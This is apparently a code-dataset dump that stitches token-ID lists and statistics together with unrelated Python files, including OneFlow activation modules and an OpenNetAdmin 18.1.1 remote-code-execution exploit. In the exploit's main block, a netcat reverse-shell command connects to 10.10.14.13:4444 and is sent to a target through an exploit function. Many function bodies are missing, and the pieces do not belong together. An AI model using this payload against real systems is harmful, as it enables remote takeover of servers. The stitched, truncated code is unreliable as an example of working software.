11,
8915,
11,
8684,
11,
8541,
11,
9225,
11,
9773,
11,
9698,
11,
9508,
11,
9849,
11,
9193,
11,
9919,
11,
10495,
11,
10261,
11,
6957,
11,
9907,
2361,
198,
17815,
796,
685,
4570,
11,
4353,
11,
2319,
11,
4764,
11,
2026,
11,
6740,
11,
3126,
11,
8190,
11,
5598,
11,
7724,
11,
8915,
11,
8684,
11,
9508,
11,
9849,
11,
9193,
11,
9907,
2361,
198,
11295,
34,
796,
685,
4570,
11,
4764,
11,
3126,
11,
7724,
11,
9508,
11,
9907,
2361,
198,
198,
26060,
796,
366,
28350,
25,
352,
12,
44754,
11,
1279,
11295,
29,
1279,
11295,
29,
19990,
66,
288,
34607,
5633,
12,
26060,
526,
198,
744,
796,
352,
198,
64,
796,
302,
13,
5589,
576,
7203,
61,
58,
66,
12,
68,
60,
685,
66,
12,
68,
60,
3,
4943,
198,
198,
28311,
25,
198,
220,
3601,
7,
26060,
8,
198,
220,
981,
6407,
25,
198,
220,
220,
220,
3465,
3198,
796,
4738,
13,
25541,
7,
17815,
8,
198,
220,
220,
220,
981,
6407,
25,
198,
220,
220,
220,
220,
220,
3465,
7571,
796,
4738,
13,
25541,
7,
17815,
8,
198,
220,
220,
220,
220,
220,
611,
1438,
6425,
7,
11295,
3198,
8,
14512,
1438,
6425,
7,
11295,
7571,
8,
290,
3465,
3198,
1279,
3465,
7571,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2270,
198,
220,
220,
220,
2872,
796,
10352,
198,
220,
220,
220,
981,
407,
2872,
25,
198,
220,
220,
220,
220,
220,
1760,
796,
10352,
198,
220,
220,
220,
220,
220,
711,
7571,
16130,
7,
11295,
3198,
11,
3465,
7571,
8,
198,
220,
220,
220,
220,
220,
981,
407,
1760,
25,
198,
220,
220,
220,
220,
220,
220,
220,
299,
796,
5128,
7203,
30,
366,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
299,
6624,
366,
16,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
711,
7571,
16130,
7,
11295,
3198,
11,
3465,
7571,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
299,
6624,
366,
30,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
26060,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
51,
3727,
46,
25,
25456,
12379,
2684,
64,
264,
303,
23781,
73,
395,
78,
6072,
78,
545,
8107,
407,
64,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
257,
13,
15699,
7,
77,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6626,
6425,
796,
299,
13,
35312,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
6626,
6425,
58,
15,
60,
6624,
1438,
6425,
7,
11295,
3198,
737,
21037,
3419,
290,
6626,
6425,
58,
16,
60,
6624,
1438,
6425,
7,
11295,
7571,
737,
21037,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
42779,
13,
7406,
2835,
13,
366,
1343,
965,
7,
744,
8,
1343,
366,
11207,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1760,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2872,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
711,
7571,
16130,
7,
3672,
17,
6425,
7,
35312,
6425,
58,
15,
46570,
1438,
17,
6425,
7,
35312,
6425,
58,
16,
60,
4008,
198,
16341,
31973,
9492,
3622,
25,
198,
220,
1208,
198
] | 2.180899 | 890 |
import functools
import requests
from sinks.base_source import BaseSource
| [
11748,
1257,
310,
10141,
198,
11748,
7007,
198,
198,
6738,
38614,
13,
8692,
62,
10459,
1330,
7308,
7416,
628
] | 4 | 19 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_accmip6
----------------------------------
Tests for `accmip6` module.
"""
import pytest
from pathlib import Path
from acccmip6.utilities.c6db import SearchDB
from acccmip6.utilities.util import _dir_path, _Construct_urls
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
201,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
201,
198,
37811,
201,
198,
9288,
62,
4134,
76,
541,
21,
201,
198,
3880,
438,
201,
198,
201,
198,
51,
3558,
329,
4600,
4134,
76,
541,
21,
63,
8265,
13,
201,
198,
37811,
201,
198,
11748,
12972,
9288,
201,
198,
6738,
3108,
8019,
1330,
10644,
201,
198,
201,
198,
6738,
697,
11215,
541,
21,
13,
315,
2410,
13,
66,
21,
9945,
1330,
11140,
11012,
201,
198,
6738,
697,
11215,
541,
21,
13,
315,
2410,
13,
22602,
1330,
4808,
15908,
62,
6978,
11,
4808,
42316,
62,
6371,
82,
201,
198,
220,
220,
220,
220,
201,
198
] | 2.5 | 120 |
#!/usr/bin/python3
'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
if __name__ == '__main__':
print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
filename = sys.argv[0]
if len(sys.argv) != 3:
helper(filename)
else:
print("[+] Connecting !")
opt = sys.argv[1].lower()
target = sys.argv[2] + '/'
if opt == 'check':
if (check(target)):
print("[+] The remote host is vulnerable!")
else:
print("[-] The remote host is NOT vulnerable!")
elif opt == 'exploit':
if (check(target)):
print("[+] Connected Successfully!")
else:
print("[-] Warning: Error while connecting o the remote target")
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f"
print(exploit(target, cmd))
else:
print("[-] Warning: Command not found !")
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
198,
7061,
6,
198,
2,
5905,
30711,
11851,
25,
4946,
7934,
46787,
1248,
13,
16,
13,
16,
532,
21520,
6127,
37497,
198,
2,
7536,
25,
12131,
12,
486,
12,
1507,
198,
2,
5905,
30711,
6434,
25,
2488,
321,
380,
403,
844,
357,
5450,
1378,
321,
380,
403,
844,
13,
785,
8,
198,
2,
39896,
5995,
7700,
25,
2638,
1378,
404,
1697,
316,
28482,
13,
785,
14,
198,
2,
10442,
7502,
25,
3740,
1378,
12567,
13,
785,
14,
404,
1697,
316,
28482,
14,
4450,
198,
2,
10628,
25,
410,
1507,
13,
16,
13,
16,
198,
2,
6208,
276,
319,
25,
7020,
198,
7061,
6,
198,
198,
11748,
7007,
198,
11748,
25064,
198,
6738,
2956,
297,
571,
18,
13,
1069,
11755,
1330,
554,
22390,
18453,
20361,
198,
198,
2,
8105,
601,
691,
262,
2060,
6509,
422,
2956,
297,
571,
18,
2622,
13,
198,
8897,
3558,
13,
43789,
13,
333,
297,
571,
18,
13,
40223,
62,
40539,
654,
7,
22872,
28,
818,
22390,
18453,
20361,
8,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
3601,
10786,
58,
9,
60,
4946,
7934,
46787,
1248,
13,
16,
13,
16,
532,
21520,
6127,
37497,
11537,
198,
220,
220,
220,
29472,
796,
25064,
13,
853,
85,
58,
15,
60,
198,
220,
220,
220,
611,
18896,
7,
17597,
13,
853,
85,
8,
14512,
513,
25,
198,
220,
220,
220,
220,
220,
220,
220,
31904,
7,
34345,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
10,
60,
8113,
278,
220,
2474,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2172,
796,
220,
25064,
13,
853,
85,
58,
16,
4083,
21037,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
2496,
796,
25064,
13,
853,
85,
58,
17,
60,
1343,
31051,
6,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2172,
6624,
705,
9122,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
357,
9122,
7,
16793,
8,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
10,
60,
383,
6569,
2583,
318,
8826,
2474,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
12,
60,
383,
6569,
2583,
318,
5626,
8826,
2474,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2172,
6624,
705,
20676,
30711,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
357,
9122,
7,
16793,
8,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
10,
60,
8113,
276,
16282,
2759,
2474,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
12,
60,
15932,
25,
13047,
981,
14320,
267,
262,
6569,
2496,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
23991,
796,
366,
26224,
1220,
22065,
14,
69,
26,
28015,
32041,
78,
1220,
22065,
14,
69,
26,
9246,
1220,
22065,
14,
69,
91,
14,
8800,
14,
1477,
532,
72,
362,
29,
5,
16,
91,
10782,
838,
13,
940,
13,
1415,
13,
1485,
604,
30272,
1875,
14,
22065,
14,
69,
1,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
20676,
30711,
7,
16793,
11,
23991,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
58,
12,
60,
15932,
25,
9455,
407,
1043,
220,
2474,
8,
198
] | 2.209375 | 640 |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import oneflow._oneflow_internal
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export, experimental_api
from oneflow.python.framework.tensor import register_tensor_op
from typing import Optional
@oneflow_export("nn.ReLU")
@experimental_api
class ReLU(Module):
r"""Applies the rectified linear unit function element-wise:
:math:`\text{ReLU}(x) = (x)^+ = \max(0, x)`
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import oneflow.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> relu = flow.nn.ReLU()
>>> ndarr = np.asarray([1, -2, 3])
>>> x = flow.Tensor(ndarr)
>>> relu(x).numpy()
array([1., 0., 3.], dtype=float32)
"""
@oneflow_export("nn.ReLU6")
@experimental_api
class ReLU6(Module):
r"""Applies the element-wise function:
.. math::
\text{Relu6}(x) = \begin{cases}
6 & \text{ if } x > 6 \\
0 & \text{ if } x < 0 \\
x & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> relu6 = flow.nn.ReLU6()
>>> out = relu6(input).numpy()
>>> print(out)
[0. 0. 0.5]
"""
@oneflow_export("nn.Tanh")
@experimental_api
class Tanh(Module):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-1, 0, 1]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> tanh = flow.nn.Tanh()
>>> out = tanh(input).numpy()
>>> print(out)
[-0.7615942 0. 0.7615942]
"""
@oneflow_export("tanh")
@register_tensor_op("tanh")
@experimental_api
def tanh_op(x):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
x = np.array([-1, 0, 1]).astype(np.float32)
input = flow.Tensor(x)
tanh = flow.nn.Tanh()
out = tanh(input).numpy()
# out [-0.7615942 0. 0.7615942]
"""
return Tanh()(x)
@oneflow_export("nn.ELU")
@experimental_api
class ELU(Module):
r"""Applies the element-wise function:
.. math::
\text{ELU}(x) = \begin{cases}
x & \text{ if } x \gt 0 \\
\alpha*(exp(x)-1) & \text{ if } x \le 0 \\
\end{cases}
Args:
alpha: the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> elu = flow.nn.ELU()
>>> out = elu(input).numpy()
>>> print(out)
[-0.39346933 0. 0.5 ]
"""
@oneflow_export("nn.GELU")
@experimental_api
class GELU(Module):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
@oneflow_export("gelu")
@register_tensor_op("gelu")
@experimental_api
def gelu_op(x):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
return GELU()(x)
@oneflow_export("nn.Sigmoid")
@experimental_api
class Sigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
m = flow.nn.Sigmoid() # or y = flow.sigmoid(x)
y = m(x)
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
@oneflow_export("sigmoid")
@register_tensor_op("sigmoid")
@experimental_api
def sigmoid_op(x):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
y = x.sigmoid()
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
return Sigmoid()(x)
@oneflow_export("nn.Hardsigmoid")
@experimental_api
class Hardsigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Hardsigmoid}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
1 & \text{ if } x \ge +3 \\
\frac{x}{6} + \frac{1}{2} & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardsigmoid = flow.nn.Hardsigmoid()
>>> out = hardsigmoid(input).numpy()
>>> print(out)
[0.41666666 0.5 0.5833333 ]
"""
@oneflow_export("nn.Softmax")
@experimental_api
@oneflow_export("softmax")
@register_tensor_op("softmax")
@experimental_api
def softmax_op(tensor, dim=None):
r"""Applies the Softmax function to an n-dimensional input Tensor
rescaling them so that the elements of the n-dimensional output Tensor
lie in the range [0,1] and sum to 1.
Softmax is defined as:
.. math::
\text{Softmax}(x_{i}) = \frac{\exp(x_i)}{\sum_j \exp(x_j)}
When the input Tensor is a sparse tensor then the unspecifed
values are treated as ``-inf``.
Shape:
- Input: :math:`(*)` where `*` means, any number of additional
dimensions
- Output: :math:`(*)`, same shape as the input
Returns:
a Tensor of the same dimension and shape as the input with
values in the range [0, 1]
Args:
dim (int): A dimension along which Softmax will be computed (so every slice
along dim will sum to 1).
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
m = flow.nn.Softmax(dim = 2)
x = flow.Tensor(
np.array(
[[[[-0.46716809, 0.40112534, 0.61984003],
[-1.31244969, -0.42528763, 1.47953856]]],
[[[ 1.02978742, -0.49383053, 1.88214159],
[ 1.35351622, -1.46251285, -1.40751374]]]]
)
)
y = m(x)
# [[[[0.6995764 0.6955959 0.29740235]
# [0.3004236 0.30440408 0.7025977 ]]]
# [[[0.4197673 0.7248568 0.96407217]
# [0.58023274 0.27514324 0.03592779]]]]
"""
return Softmax(dim)(tensor)
@oneflow_export("nn.LogSoftmax")
@experimental_api
class LogSoftmax(Module):
r"""Applies the :math:`\log(\text{Softmax}(x))` function to an n-dimensional
input Tensor.
The LogSoftmax formulation can be simplified as:
.. math::
\text{LogSoftmax}(x_{i}) = \log\left(\frac{\exp(x_i) }{ \sum_j \exp(x_j)} \right)
Args:
dim (int): A dimension along which LogSoftmax will be computed.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
m = flow.nn.LogSoftmax(dim=1)
x = flow.Tensor(
np.array(
[[ 0.4296, -1.1957, 2.5463],
[ 1.2552, -1.5747, 0.6923]]
)
)
y = m(x)
# [[-2.251349 -3.8766491 -0.13464898]
# [-0.48770458 -3.3176045 -1.0506046 ]]
"""
@oneflow_export("nn.LogSigmoid")
@experimental_api
class LogSigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> logsigmoid = flow.nn.LogSigmoid()
>>> out = logsigmoid(input).numpy()
>>> print(out)
[-0.974077 -0.6931472 -0.47407696]
"""
@oneflow_export("nn.Softplus")
@experimental_api
class Softplus(Module):
r"""Applies the element-wise function:
.. math::
\text{Softplus}(x) = \frac{1}{\beta} * \log(1 + \exp(\beta * x))
SoftPlus is a smooth approximation to the ReLU function and can be used
to constrain the output of a machine to always be positive.
For numerical stability the implementation reverts to the linear function
when :math:`input \times \beta > threshold`.
Args:
beta: the :math:`\beta` value for the Softplus formulation. Default: 1
threshold: values above this revert to a linear function. Default: 20
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> softplus = flow.nn.Softplus()
>>> out = softplus(input).numpy()
>>> print(out)
[0.474077 0.6931472 0.974077 ]
"""
@oneflow_export("nn.Hardswish")
@experimental_api
class Hardswish(Module):
r"""Applies the hardswish function, element-wise, as described in the paper:
`Searching for MobileNetV3`_.
.. math::
\text{Hardswish}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
x & \text{ if } x \ge +3 \\
x*(x+3)/6 & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardswish = flow.nn.Hardswish()
>>> out = hardswish(input).numpy()
>>> print(out)
[-0.20833333 0. 0.29166666]
.. _`Searching for MobileNetV3`:
https://arxiv.org/abs/1905.02244
"""
@oneflow_export("nn.Hardtanh")
@experimental_api
class Hardtanh(Module):
r"""
Applies the HardTanh function element-wise
HardTanh is defined as:
.. math::
\text{HardTanh}(x) = \begin{cases}
1 & \text{ if } x > 1 \\
-1 & \text{ if } x < -1 \\
x & \text{ otherwise } \\
\end{cases}
The range of the linear region :math:`[-1, 1]` can be adjusted using
:attr:`min_val` and :attr:`max_val`.
Args:
min_val: minimum value of the linear region range. Default: -1
max_val: maximum value of the linear region range. Default: 1
inplace: can optionally do the operation in-place. Default: ``False``
Keyword arguments :attr:`min_value` and :attr:`max_value`
have been deprecated in favor of :attr:`min_val` and :attr:`max_val`.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.Hardtanh()
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 1. 1. ]
"""
@oneflow_export("nn.LeakyReLU")
@experimental_api
class LeakyReLU(Module):
r"""Applies the element-wise function:
.. math::
\text{LeakyReLU}(x) = \max(0, x) + \text{negative_slope} * \min(0, x)
or
.. math::
\text{LeakyRELU}(x) = \begin{cases}
x, & \text{ if } x \geq 0 \\
\text{negative_slope} \times x, & \text{ otherwise }
\end{cases}
Args:
negative_slope: Controls the angle of the negative slope. Default: 1e-2
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.LeakyReLU(0.1)
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 3. 4. ]
"""
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
37811,
198,
15269,
12131,
383,
1881,
37535,
46665,
13,
1439,
2489,
10395,
13,
198,
198,
26656,
15385,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
5832,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
1639,
743,
7330,
257,
4866,
286,
262,
13789,
379,
628,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
198,
28042,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
17080,
6169,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
54,
10554,
12425,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
6214,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2475,
20597,
739,
262,
13789,
13,
198,
37811,
198,
11748,
530,
11125,
355,
5202,
198,
11748,
530,
11125,
13557,
505,
11125,
62,
32538,
198,
6738,
530,
11125,
13,
29412,
13,
20471,
13,
21412,
1330,
19937,
198,
6738,
530,
11125,
13,
29412,
13,
505,
11125,
62,
39344,
1330,
530,
11125,
62,
39344,
11,
11992,
62,
15042,
198,
6738,
530,
11125,
13,
29412,
13,
30604,
13,
83,
22854,
1330,
7881,
62,
83,
22854,
62,
404,
198,
6738,
19720,
1330,
32233,
628,
198,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
3041,
41596,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
797,
41596,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
13621,
1431,
14174,
4326,
2163,
5002,
12,
3083,
25,
628,
220,
220,
220,
1058,
11018,
25,
63,
59,
5239,
90,
3041,
41596,
92,
7,
87,
8,
796,
357,
87,
8,
61,
10,
796,
3467,
9806,
7,
15,
11,
2124,
8,
63,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
823,
84,
796,
5202,
13,
20471,
13,
3041,
41596,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
299,
67,
3258,
796,
45941,
13,
292,
18747,
26933,
16,
11,
532,
17,
11,
513,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
5202,
13,
51,
22854,
7,
358,
3258,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
823,
84,
7,
87,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
7177,
26933,
16,
1539,
657,
1539,
513,
13,
4357,
288,
4906,
28,
22468,
2624,
8,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
3041,
41596,
21,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
797,
41596,
21,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
628,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
6892,
84,
21,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
718,
1222,
3467,
5239,
90,
611,
1782,
2124,
1875,
718,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
1222,
3467,
5239,
90,
611,
1782,
2124,
1279,
657,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
1222,
3467,
5239,
90,
4306,
1782,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
